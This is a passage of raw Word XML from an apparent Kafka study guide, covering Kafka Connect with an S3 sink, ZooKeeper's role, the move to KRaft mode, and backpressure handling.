          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Amazon S3</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for backup, archival, or processing in analytics platforms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E42624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S3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C23B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D67FC4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7945736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86900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6F5160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1FEAB52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0A34DCF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290D6E8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035634D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1D36095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age.class": "io.confluent.connect.s3.storage.S3Storage",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D11951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mat.class": "io.confluent.connect.s3.format.avro.AvroFormat",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6691739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chema.generator.class": "io.confluent.connect.storage.hive.HiveSchemaGenerator"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750B3DD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505BD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4E00EF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Using Kafka Connect for Integration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AAD4A1"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Integration</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EABCF1F"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pre-built connectors for many popular data systems, making it easy to integrate Kafka with external systems like relational databases, HDFS, cloud storage, and messaging queues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5035BF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3906C0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out horizontally by running multiple workers in a distributed setup, allowing it to handle high-throughput scenarios effectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531ECB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5F782122"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for fault tolerance. If a worker node fails, the tasks assigned to it will be automatically reassigned to available workers, ensuring continued operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9BF02B"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evelopment Effort</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F595A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reduces the need for custom integration code. By using pre-built connectors, developers do not need to manage the complexity of reading and writing to external systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FCE7EE"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exible and Extensible</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5A4231"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configurable and supports custom connectors, allowing integration with virtually any system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AA3C80"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Management</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DFDE27"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onnect REST API allows for centralized management of connectors, making it easier to deploy, configure, and monitor integrations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5A6E55"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Transformation</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B47AFDB"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xml:space="preserve"> that allow simple transformations of data during ingestion or export. This can be useful for formatting, filtering, or enriching data as it flows between Kafka and external systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083263DE"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02DE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powerful and scalable solution for integrating Kafka with various external systems. By leveraging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ustom extensions</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, Kafka Connect simplifies the process of integrating Kafka with data systems such as databases, file systems, cloud storage, and messaging queues. It allows organizations to easily create </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>real-time data pipelines</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and move large volumes of data across different systems with minimal development effort.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4C491F" w14:textId="0FE44D4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413" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9DD98A" w14:textId="0E4A997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1" w:name="_Toc197868065"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the purpose of Kafka's ZooKeeper, and can Kafka work without ZooKeeper</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="851"/>
    </w:p>
    <w:p w14:paraId="3DA149BB" w14:textId="66B361CD" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC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urpose of Kafka's ZooKeeper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F964EF8"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ere are some key responsibilities of </w:t>
      </w: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n Kafka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3127636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luster Metadata Management</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1D036A"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for Partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0022DB7B"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Discovery</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2532F5"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so that other brokers can discover them and work with them. This is important for maintaining a cluster of Kafka brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6120C07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40845871"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stores important configuration information for the Kafka cluster. This includes topic configurations, partition assignments, and replication factors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3041BE45"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52D2106"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manage the health of the Kafka cluster. If a broker or a leader partition fails, ZooKeeper can coordinate failover procedures and notify the other brokers, ensuring minimal disruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F58D9B8"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Coordination</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA528F4"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lies on ZooKeeper for coordination of distributed processes, like handling consumer group offsets and partition reassignment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012112E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an Kafka Work Without ZooKeeper?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDFD25B"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tarting with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t is possible to run Kafka </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>without ZooKeeper</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. This feature is part of Kafka’s transition toward removing ZooKeeper dependency. Kafka is moving towards a </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>KRaft (Kafka Raft)</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> mode, where Kafka brokers themselves take over the roles that ZooKeeper traditionally handled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6195D91B"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hanges in KRaft Mode (Kafka Raft)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB6C357"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adata Management</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A70B4FA"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Raft mode, Kafka brokers themselves manage metadata without relying on ZooKeeper. This is achieved through a new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0DBA2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34F6E85D"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KRaft will manage leader election internally using the Raft protocol, rather than using ZooKeeper to elect partition leaders.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3D1105"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4C2F9D4"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tself will handle partition leader election and failure recovery, making it more self-contained and eliminating the need for an external coordination service like ZooKeeper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F734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Architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A6D1D7"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ZooKeeper, Kafka’s architecture becomes simpler, and there is no need to manage a separate ZooKeeper ensemble, which reduces operational complexity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECD2B27"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dvantages of Kafka Without ZooKeeper (KRaft Mode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFD4F5B"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 Eliminates the overhead of running and maintaining a ZooKeeper ensemble.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DA4E3F"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roved Reliability</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Reduces the risk of coordination failures between ZooKeeper and Kafka.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F887DA"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Internal management of metadata can potentially reduce latency when compared to ZooKeeper-based coordination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31807C2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imitations and Current Status:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2928BD37"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Phase</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: As of now, KRaft mode is still under development and is not yet fully mature or recommended for large-scale production environments in all cases. However, Kafka 2.8.0 and later versions support </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ZooKeeper-less</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operation in a more experimental mode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEFABEB"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tibility</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: KRaft mode requires Kafka clusters to be set up without ZooKeeper, which may not be compatible with existing versions that depend on ZooKeeper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A30E0A"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55E9443"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has been a critical component of Kafka, managing metadata, partition leadership, and fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586AA747"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Without ZooKeeper</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: With the introduction of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C184BD3">
          <v:rect id="_x0000_i3414" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C18058B" w14:textId="4C9D2E60"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2" w:name="_Toc197868066"/>
      <w:r w:rsidRPr="00CE4B95">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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="852"/>
    </w:p>
    <w:p w14:paraId="0706337D" w14:textId="45FDCA54" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932"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ole of ZooKeeper in Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F201BA"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Metadata Management</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14298DD5"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4FF14E53"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Coordination and Discovery</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFA13D1"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ZooKeeper maintains the list of active brokers, and this information is used for inter-broker communication and coordination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D71FF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and Recovery</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F1A4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Kafka recover from broker failures. If a broker fails or a partition leader is lost, ZooKeeper facilitates recovery by helping the cluster elect a new leader and reassign partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B31C986"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300CDD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1CC643F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urrent Move Towards KRaft Mode (Kafka Raft Mode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2BD5B0"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s part of Kafka's evolution,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ntroduced a major change: the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2B1C209"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 are the details of the transition from ZooKeeper to KRaft mode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286DD246"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aft Consensus Protocol:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18289CC7"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Kafka brokers take on the responsibility of managing metadata, including leader election and partition management, without the need for ZooKeeper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69132D7F"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aft protocol, which is a consensus algorithm designed for managing replicated logs, replaces ZooKeeper's role in maintaining consistency across brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC54B9D"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tadata Management within Kafka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF27DC7"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will store and manage cluster metadata themselves, which means that ZooKeeper is no longer needed to store information about topics, partitions, and configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D040E3"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luster metadata will be maintained in a distributed log, ensuring that brokers can reach consensus on changes to metadata.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B563F93"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eader Election in KRaft Mode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D1AE96"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stead of using ZooKeeper for leader election for partitions, Kafka brokers in KRaft mode elect leaders using the Raft consensus mechanism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65239592"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allows for more streamlined operations and reduces the complexity of having a separate ZooKeeper ensemble for leader election.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212DDD3B"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implified Architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778CD614"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moving ZooKeeper reduces the operational complexity of managing a Kafka cluster. Kafka can now operate independently, without the need to manage and maintain a separate ZooKeeper ensemble.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FDBF90"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This change makes Kafka more self-contained and easier to deploy, manage, and scale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AAF2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Improved Fault Tolerance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262E5CFB" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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Transition and Compatibility:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE18E17"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lusters that rely on ZooKeeper are still fully supported, and migration to KRaft mode will be an optional upgrade.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33302791"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ward Compatibility</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For the time being, Kafka supports both ZooKeeper-based and KRaft-based clusters, allowing users to choose whether they want to upgrade to KRaft mode or continue with their ZooKeeper-based setups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596AAD2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Raft Mode (Kafka Raft)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C81BC4F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4822084D"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tter Fault Tolerance and Scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1AA80F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0793164C"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nified Metadata Management</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC0A9F8"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B71F58C"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to KRaft Mode</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka is moving toward a ZooKeeper-less architecture using the </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Raft consensus protocol</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. KRaft mode will simplify Kafka's architecture by having Kafka brokers manage their metadata and partition leaders, removing the need for an external coordination service. While this is a significant improvement, it is still in the process of being fully developed and tested in production environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FEDD4B"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415" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EB181E" w14:textId="390451F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3" w:name="_Toc197868067"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does Kafka handle backpressure</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="853"/>
    </w:p>
    <w:p w14:paraId="23092F8E" w14:textId="02244101" w:rsidR="00542F33" w:rsidRPr="0003272F" w:rsidRDefault="00542F33"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side Backpressure Handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C786EA6"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 and batching</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka producers accumulate messages into batches to send them to brokers. If the producer’s buffer becomes full due to high production rates, Kafka's producer API provides configurable </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>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or retries</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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synchronous delivery</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Broker-side Backpressure Handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF8A66A"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 and Replication Factor</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Capacity and Log Segments</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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side Backpressure Handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C34017"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e most common form of backpressure on the consumer side i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where a consumer is falling behind in consuming messages from the broker. Kafka keeps track of the consumer’s offset (position in the topic), and if consumers are slow, it’s reflected as lag (the difference between the latest message offset and the consumer’s offset). Consumer lag allows the system to monitor backpressure in real-time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A605634"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 xml:space="preserve">: Kafka enables the use of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Polling and Fetching Configurations</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
